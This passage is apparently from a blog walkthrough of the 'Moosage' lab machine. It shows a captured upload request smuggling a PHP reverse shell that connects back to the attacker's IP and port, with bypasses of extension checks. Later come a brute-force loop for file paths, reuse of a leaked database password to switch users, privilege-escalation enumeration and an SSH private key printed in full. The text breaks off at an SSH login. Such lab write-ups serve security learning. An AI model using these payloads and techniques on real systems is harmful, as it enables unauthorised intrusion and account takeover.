src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040126.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250616224141732\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>Then set up a listener and upload. There was no error, but nothing was displayed either, so write any title and publish the post:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040127.png'><img 
class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040127.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250616224522215\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Nothing. There are now two approaches to try: one is to work out the naming rule and brute-force it or something similar, the other is to look at the response:<\/p>\n<p>Since the previous image was named <code>13x5<\/code>, I guessed that the file name had been changed, so try brute-forcing the two-digit to one-digit combinations, as well as the suffix:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ for i in {1..99}; do for j in {1..99}; do url=&quot;http:\/\/192.168.10.106\/blog\/data\/i\/${i}x${j}.jpg&quot;; curl -s -I --head &quot;$url&quot; | grep -q &quot;200 OK&quot; &amp;&amp; echo &quot;$url exists&quot; || echo &quot;$url missing&quot;; done; done | grep -v missing\nhttp:\/\/192.168.10.106\/blog\/data\/i\/13x5.jpg exists<\/code><\/pre>\n<p>Nothing found. After uploading once more, I noticed that the upload path for <code>gif<\/code> is a bit different...<\/p>\n<pre><code 
class=\"language-bash\">http:\/\/192.168.10.106\/blog\/data\/t\/3k94.gif<\/code><\/pre>\n<p>It seems the suffix cannot be changed to <code>GIF<\/code> when uploading.... Upload again:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040128.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040128.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250616225746430\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>OK, no need to agonize over that any more..... But the file was not parsed, so change the suffix to php and upload again:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040129.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040129.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" 
alt=\"image-20250616230421792\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Capture and modify the request to do the upload. Along the way I found there is front-end verification, so change the suffix first and change it back in the captured request... Had I known, I would have captured the request directly; trying to save effort ended up wasting more time....<\/p>\n<pre><code class=\"language-bash\">POST \/blog\/ajax.php?action=upload_image HTTP\/1.1\nHost: 192.168.10.106\nReferer: http:\/\/192.168.10.106\/blog\/\nOrigin: http:\/\/192.168.10.106\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/137.0.0.0 Safari\/537.36\nAccept: application\/json, text\/javascript, *\/*; q=0.01\nContent-Type: multipart\/form-data; boundary=----WebKitFormBoundaryKz0K0OZnM3LuzHDJ\nCsrf-Token: 19fbb9deda\nAccept-Language: zh-CN,zh;q=0.9\nCookie: PHPSESSID=kc59al1coqm724jhfn0139ck89\nContent-Length: 4098\n\n------WebKitFormBoundaryKz0K0OZnM3LuzHDJ\nContent-Disposition: form-data; name=&quot;file&quot;; filename=&quot;rev.jpg&quot;\nContent-Type: image\/jpeg\n\nGIF89a\n  &lt;?php\n  \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n  \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n  set_time_limit (0);\n  $VERSION = &quot;1.0&quot;;\n  $ip = &#039;192.168.10.107&#039;;  \/\/ You have changed this\n  $port = 1234;  \/\/ And this\n  $chunk_size = 1400;\n  $write_a = null;\n  $error_a = null;\n  $shell = &#039;uname -a; w; id; \/bin\/sh -i&#039;;\n  $daemon = 0;\n  $debug = 0;<\/code><\/pre>\n<p>After modifying the request, the upload succeeded:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040130.png'><img 
class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040130.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250616232243158\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>I tried requesting the file to trigger it, but it was still not parsed:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040132.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040132.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250616232553033\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>I changed the uploaded file type once more and got a reverse shell!!!!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040133.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040133.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250616233250326\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Try to trigger it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ curl -s &quot;http:\/\/$IP\/blog\/data\/i\/52Cp.php&quot; \n<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040134.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040134.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250616233346915\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>Privilege escalation<\/h2>\n<h3>Switching user via password reuse<\/h3>\n<p>Earlier I obtained the database username and password, and they are no longer the defaults, so I guessed there might be information inside and tested <code>baca:youareinsane<\/code>:<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@moosage:\/$ mysql -u baca -p\nEnter 
password: \nWelcome to the MariaDB monitor.  Commands end with ; or \\g.\nYour MariaDB connection id is 66\nServer version: 10.3.27-MariaDB-0+deb10u1 Debian 10\n\nCopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.\n\nType &#039;help;&#039; or &#039;\\h&#039; for help. Type &#039;\\c&#039; to clear the current input statement.\n\nMariaDB [(none)]&gt; show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| information_schema |\n| moosage            |\n+--------------------+\n2 rows in set (0.000 sec)\n\nMariaDB [(none)]&gt; use moosage;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nMariaDB [moosage]&gt; show tables;\n+-------------------+\n| Tables_in_moosage |\n+-------------------+\n| images            |\n| posts             |\n+-------------------+\n2 rows in set (0.000 sec)\n\nMariaDB [moosage]&gt; select * from images;posts;\n+----+-------------------------------------------+-----------------+-----------------+------+----------------------------------+---------------------+--------+\n| id | name                                      | path            | thumb           | type | md5                              | datetime            | status |\n+----+-------------------------------------------+-----------------+-----------------+------+----------------------------------+---------------------+--------+\n|  1 | 1b7fad26-6111-11eb-8b33-0242c0a820020.jpg | data\/i\/13x5.jpg | data\/t\/13x5.jpg | jpg  | baaa37b759cd0838ea635e7b767667ea | 2025-06-16 10:39:10 |      1 |\n|  2 | rev.gif                                   | NULL            | NULL            | gif  | 766b3d09b0f7a0807e635d12a17c56c6 | 2025-06-16 10:42:16 |      0 |\n|  3 | a.gif                                     | data\/i\/3k94.gif | data\/t\/3k94.gif | gif  | e2e612fd10a8f09e56c2ba50e75f6e81 | 2025-06-16 10:54:45 |      1 |\n|  4 | rev.jpg           
                        | data\/i\/4aPK.jpg | data\/t\/4aPK.jpg | jpg  | 31c7a30396940b1e65d9006261de6c25 | 2025-06-16 10:56:50 |      1 |\n|  5 | rev.php                                   | data\/i\/52Cp.php | data\/t\/52Cp.php | php  | 07d48c04c024adf4070509af119d095e | 2025-06-16 11:22:33 |      1 |\n+----+-------------------------------------------+-----------------+-----------------+------+----------------------------------+---------------------+--------+\n5 rows in set (0.000 sec)\n\nERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near &#039;posts&#039; at line 1\nMariaDB [moosage]&gt; use information_schema;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nMariaDB [information_schema]&gt; show tables;\n+---------------------------------------+\n| Tables_in_information_schema          |\n+---------------------------------------+\n| ALL_PLUGINS                           |\n| APPLICABLE_ROLES                      |\n| CHARACTER_SETS                        |\n| CHECK_CONSTRAINTS                     |\n| COLLATIONS                            |\n| COLLATION_CHARACTER_SET_APPLICABILITY |\n| COLUMNS                               |\n| COLUMN_PRIVILEGES                     |\n| ENABLED_ROLES                         |\n| ENGINES                               |\n| EVENTS                                |\n| FILES                                 |\n| GLOBAL_STATUS                         |\n| GLOBAL_VARIABLES                      |\n| KEY_CACHES                            |\n| KEY_COLUMN_USAGE                      |\n| PARAMETERS                            |\n| PARTITIONS                            |\n| PLUGINS                               |\n| PROCESSLIST                           |\n| PROFILING                             |\n| REFERENTIAL_CONSTRAINTS               
|\n| ROUTINES                              |\n| SCHEMATA                              |\n| SCHEMA_PRIVILEGES                     |\n| SESSION_STATUS                        |\n| SESSION_VARIABLES                     |\n| STATISTICS                            |\n| SYSTEM_VARIABLES                      |\n| TABLES                                |\n| TABLESPACES                           |\n| TABLE_CONSTRAINTS                     |\n| TABLE_PRIVILEGES                      |\n| TRIGGERS                              |\n| USER_PRIVILEGES                       |\n| VIEWS                                 |\n| GEOMETRY_COLUMNS                      |\n| SPATIAL_REF_SYS                       |\n| CLIENT_STATISTICS                     |\n| INDEX_STATISTICS                      |\n| INNODB_SYS_DATAFILES                  |\n| USER_STATISTICS                       |\n| INNODB_SYS_TABLESTATS                 |\n| INNODB_LOCKS                          |\n| INNODB_MUTEXES                        |\n| INNODB_CMPMEM                         |\n| INNODB_CMP_PER_INDEX                  |\n| INNODB_CMP                            |\n| INNODB_FT_DELETED                     |\n| INNODB_CMP_RESET                      |\n| INNODB_LOCK_WAITS                     |\n| TABLE_STATISTICS                      |\n| INNODB_TABLESPACES_ENCRYPTION         |\n| INNODB_BUFFER_PAGE_LRU                |\n| INNODB_SYS_FIELDS                     |\n| INNODB_CMPMEM_RESET                   |\n| INNODB_SYS_COLUMNS                    |\n| INNODB_FT_INDEX_TABLE                 |\n| INNODB_CMP_PER_INDEX_RESET            |\n| user_variables                        |\n| INNODB_FT_INDEX_CACHE                 |\n| INNODB_SYS_FOREIGN_COLS               |\n| INNODB_FT_BEING_DELETED               |\n| INNODB_BUFFER_POOL_STATS              |\n| INNODB_TRX                            |\n| INNODB_SYS_FOREIGN                    |\n| INNODB_SYS_TABLES                     |\n| INNODB_FT_DEFAULT_STOPWORD            |\n| INNODB_FT_CONFIG 
                     |\n| INNODB_BUFFER_PAGE                    |\n| INNODB_SYS_TABLESPACES                |\n| INNODB_METRICS                        |\n| INNODB_SYS_INDEXES                    |\n| INNODB_SYS_VIRTUAL                    |\n| INNODB_TABLESPACES_SCRUBBING          |\n| INNODB_SYS_SEMAPHORE_WAITS            |\n+---------------------------------------+\n76 rows in set (0.000 sec)\n\nMariaDB [information_schema]&gt; select * from user_variables;\nEmpty set (0.000 sec)\n\nMariaDB [information_schema]&gt; exit\nBye<\/code><\/pre>\n<p>No useful information was found... But there is a user with the same name, so I tried reusing the password and it worked:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040135.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040135.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250616233944682\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Basic information gathering<\/h3>\n<pre><code class=\"language-bash\">baca@moosage:~$ ls -la\ntotal 36\ndrwxr-xr-x 3 baca baca 4096 Apr 22  2021 .\ndrwxr-xr-x 3 root root 4096 Apr 22  2021 ..\n-rw-r--r-- 1 baca baca  220 Apr 22  2021 .bash_logout\n-rw-r--r-- 1 baca baca 3526 Apr 22  2021 .bashrc\n-rwx--x--x 1 baca baca 1920 Apr 22  2021 flag.sh\ndrwxr-xr-x 3 baca baca 4096 Apr 22  2021 .local\n-rw-r--r-- 1 baca baca  807 Apr 22  2021 
.profile\n-rw------- 1 baca baca   13 Apr 22  2021 user.txt\n-rw------- 1 baca baca   53 Apr 22  2021 .Xauthority\nbaca@moosage:~$ .\/flag.sh \n\\033[0;35m\n                                   .     **                                     \n                                *           *.                                  \n                                              ,*                                \n                                                 *,                             \n                         ,                         ,*                           \n                      .,                              *,                        \n                    \/                                    *                      \n                 ,*                                        *,                   \n               \/.                                            .*.                \n             *                                                  **              \n             ,*                                               ,*                \n                **                                          *.                  \n                   **                                    **.                    \n                     ,*                                **                       \n                        *,                          ,*                          \n                           *                      **                            \n                             *,                .*                               \n                                *.           
**                                 \n                                  **      ,*,                                   \n                                     ** *,     \\033[0m\n-------------------------\n\\nPWNED HOST: moosage\n\\nPWNED DATE: Mon 16 Jun 2025 11:39:58 AM EDT\n\\nWHOAMI: uid=1000(baca) gid=1000(baca) groups=1000(baca),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)\n\\nFLAG: hmvmessageme\n\\n------------------------\nbaca@moosage:~$ sudo -l\nbash: sudo: command not found\nbaca@moosage:~$ whereis sudo\nsudo:\nbaca@moosage:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/passwd\n\/usr\/bin\/umount\n\/usr\/bin\/newgrp\n\/usr\/bin\/chsh\n\/usr\/bin\/gpasswd\n\/usr\/bin\/su\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\nbaca@moosage:~$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. 
These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n#\ncat: \/etc\/cron.weekly: Is a directory\nbaca@moosage:~$ find \/ -type d -writable 
2&gt;\/dev\/null\n\/sys\/fs\/cgroup\/systemd\/user.slice\/user-1000.slice\/user@1000.service\n\/sys\/fs\/cgroup\/systemd\/user.slice\/user-1000.slice\/user@1000.service\/init.scope\n\/sys\/fs\/cgroup\/unified\/user.slice\/user-1000.slice\/user@1000.service\n\/sys\/fs\/cgroup\/unified\/user.slice\/user-1000.slice\/user@1000.service\/init.scope\n\/run\/user\/1000\n\/run\/user\/1000\/systemd\n\/run\/lock\n\/var\/lib\/php\/sessions\n\/var\/tmp\n\/home\/baca\n\/home\/baca\/.local\n\/home\/baca\/.local\/share\n\/home\/baca\/.local\/share\/nano\n\/dev\/mqueue\n\/dev\/shm\n\/proc\/1025\/task\/1025\/fd\n\/proc\/1025\/fd\n\/proc\/1025\/map_files\n\/tmp\n\/tmp\/.font-unix\n\/tmp\/.XIM-unix\n\/tmp\/.ICE-unix\n\/tmp\/.X11-unix\n\/tmp\/.Test-unix<\/code><\/pre>\n<p>I tried uploading <code>linpeas.sh<\/code> and <code>pspy64<\/code>, but neither revealed an exploitable point. Checking the experts' <code>wp<\/code> (writeups), it turns out the exploitable point actually requires logging in over <code>ssh<\/code>...<\/p>\n<h3>SSH cowsay configuration file hijacking<\/h3>\n<p>First, generate a private key:<\/p>\n<pre><code class=\"language-bash\">(remote) baca@moosage:\/tmp$ cd ~\n(remote) baca@moosage:\/home\/baca$ ls -la\ntotal 36\ndrwxr-xr-x 3 baca baca 4096 Apr 22  2021 .\ndrwxr-xr-x 3 root root 4096 Apr 22  2021 ..\n-rw-r--r-- 1 baca baca  220 Apr 22  2021 .bash_logout\n-rw-r--r-- 1 baca baca 3526 Apr 22  2021 .bashrc\n-rwx--x--x 1 baca baca 1920 Apr 22  2021 flag.sh\ndrwxr-xr-x 3 baca baca 4096 Apr 22  2021 .local\n-rw-r--r-- 1 baca baca  807 Apr 22  2021 .profile\n-rw------- 1 baca baca   13 Apr 22  2021 user.txt\n-rw------- 1 baca baca   53 Apr 22  2021 .Xauthority\n(remote) baca@moosage:\/home\/baca$ mkdir .ssh\n(remote) baca@moosage:\/home\/baca$ cd .ssh\n(remote) baca@moosage:\/home\/baca\/.ssh$ ssh-keygen -o\nGenerating public\/private rsa key pair.\nEnter file in which to 
save the key (\/home\/baca\/.ssh\/id_rsa): \nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/baca\/.ssh\/id_rsa.\nYour public key has been saved in \/home\/baca\/.ssh\/id_rsa.pub.\nThe key fingerprint is:\nSHA256:pZJRKfzVdSbn1S\/q69LV6jI0uqyA6q\/QBGAdMKHK+hI baca@moosage\nThe key&#039;s randomart image is:\n+---[RSA 2048]----+\n|.=+...  .. . .o *|\n|+ ..  o.. . .  *o|\n|o     .o ..     o|\n|o.     o.o    . .|\n|...   o S    . o |\n|Eo   . .    + . .|\n|o.. . .    = o . |\n|.o .   . .o = .  |\n| o=o.   ..o+o=.  |\n+----[SHA256]-----+\n(remote) baca@moosage:\/home\/baca\/.ssh$ cat id_rsa\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEA3k2MP0wQn7tzLdpT87olkrgzzCgB4UuUjN\/w7U41VimPJxxNdpJi\nZOw1cE34NkJQW+5yDVVmM4JckQFvcVuJ0posXVU1mLczE7LIF6ghnDYq7frUVb0vBEnMl8\n08YD20lZHZEQiYyX6ZewUIzblJmz3SmUrKeF9hTQYZ9dNPtU9pfBGDlN2uu3zIBj4y\/\/XU\nmBEihqpsqGg5KsqydbmHHv1B9TKP3Zp2RO4bj3ahAJ4PXlxDCqVqlSXwnmprnMVbUtfLw6\nUXf2p3HbKx253Vwd\/587J70tS+JE7IgIuVJRAsAg+YoDxrUYPA2rVEeOPceZIXQkGH7Eui\n04Y\/VXzvFQAAA8jHrPPNx6zzzQAAAAdzc2gtcnNhAAABAQDeTYw\/TBCfu3Mt2lPzuiWSuD\nPMKAHhS5SM3\/DtTjVWKY8nHE12kmJk7DVwTfg2QlBb7nINVWYzglyRAW9xW4nSmixdVTWY\ntzMTssgXqCGcNirt+tRVvS8EScyXzTxgPbSVkdkRCJjJfpl7BQjNuUmbPdKZSsp4X2FNBh\nn100+1T2l8EYOU3a67fMgGPjL\/9dSYESKGqmyoaDkqyrJ1uYce\/UH1Mo\/dmnZE7huPdqEA\nng9eXEMKpWqVJfCeamucxVtS18vDpRd\/ancdsrHbndXB3\/nzsnvS1L4kTsiAi5UlECwCD5\nigPGtRg8DatUR449x5khdCQYfsS6LThj9VfO8VAAAAAwEAAQAAAQEAgD+65pWKjayGEXEA\nt\/6vSIrujxyRoRmKdQ+JHk7dZH0LcmPYqMxg6ZqAZe8FgMAXPkI9GEYpdRQDNUDfu0U1KQ\nP7DklnZ1hhpj6hQ0yjP0zczXjE4UYIhu\/Qkc88wsU2loeS9EnCY5SfFSLdZlo8BczP39IP\nJwzXxKj9dx3WwWEguzVLzCtS3WQEIVS37oKDu1MgWN4ZJoCeN+5ciiOP5DBUfI7IPbYIPg\nJqEJjq7fohkH1fe3XIUM9e8bt+gSDsd051EU1kccm7fsuRH7Ze1lEBcPtlANJwoJ+7VxGX\nP2PGoEVEthm58gNdOG7p+PMbmVmylXkvVwrnpq\/f0qQpAQAAAIArsg0i+ISVd2ubLa7PAA\n\/D\/C+SZeb24OdA2evT02RHR0pBltJ9OzPWMPMmVXoanvH10VV0E8b
slbhC64TW7Gqsk0yc\nFXwId4+RsdzawHQSRZvur0RnzB0\/WJL0IR20hPr7yX7VF8\/dyjDrdr03Q9pjsmlFSJ\/uxA\njlWep3xLyOzQAAAIEA9WUB10a1I9hD9PJ0agVNv+CAA5ta7JJPMu8xtdt\/rKINqAyAbW1x\newjHwMdcHPUqVT18YXzhpQxqlawj1aiAamSmt0+6XKgH7DB\/vEJ\/Z\/2dhCatO6VP5BVUC\/\ncTs+GnrHA1scYaKN3cAltuMDPeHPcl68BA9pGyVlnthUizaNUAAACBAOfpD0l+qgIY+FCb\nYf4YWAU9a9eyRsXGXZFbZX9wfxQkyovhZtt4IKdNi+kUCf+BbWf63rrvD3b5ct\/s+J4Wq1\nHLAsH\/q+JhzPxVy4xgeGqwIYBNdVX6gs3PP+GB3zATkKZFkH+zu7UlOCbZ7NrCPFaCqg5i\nl\/xygU\/EtYiLao1BAAAADGJhY2FAbW9vc2FnZQECAwQFBg==\n-----END OPENSSH PRIVATE KEY-----\n(remote) baca@moosage:\/home\/baca\/.ssh$ mv id_rsa.pub authorized_keys\n(remote) baca@moosage:\/home\/baca\/.ssh$ ls -la\ntotal 16\ndrwxrwxrwx 2 baca baca 4096 Jun 16 12:10 .\ndrwxr-xr-x 4 baca baca 4096 Jun 16 12:09 ..\n-rw-r--r-- 1 baca baca  394 Jun 16 12:09 authorized_keys\n-rw------- 1 baca baca 1823 Jun 16 12:09 id_rsa<\/code><\/pre>\n<p>Log in over <code>ssh<\/code>:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ vim baca\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ 